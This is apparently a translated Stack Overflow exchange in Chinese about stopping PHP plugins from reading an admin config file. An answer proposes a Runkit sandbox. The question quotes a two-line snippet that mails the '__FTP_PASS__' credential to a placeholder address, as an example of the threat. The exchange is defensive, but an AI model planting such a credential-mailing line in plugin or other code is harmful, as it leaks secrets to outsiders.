am编写一个支持使用插件的应用程序,该插件可以连接到管理员。
如何保护配置文件,因为当前,如果插件开发人员写入:
$msg=__FTP_PASS__;
mail("email@email","subject",$msg);
消息与密码一起发送。我如何防止这种情况,因为这发生了,因为我在管理页面的顶部包括了" config.php"。谢谢。#对不起,我不知道如何在Stackoverf上格式化问题
您可以使用某种PHP沙箱(Runkit's Runkit_sandbox类)来防止这种情况,但是它不是PHP的标准部分,并且正确使用它不会很琐碎。<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
让用户运行任意代码绝不是一个好主意。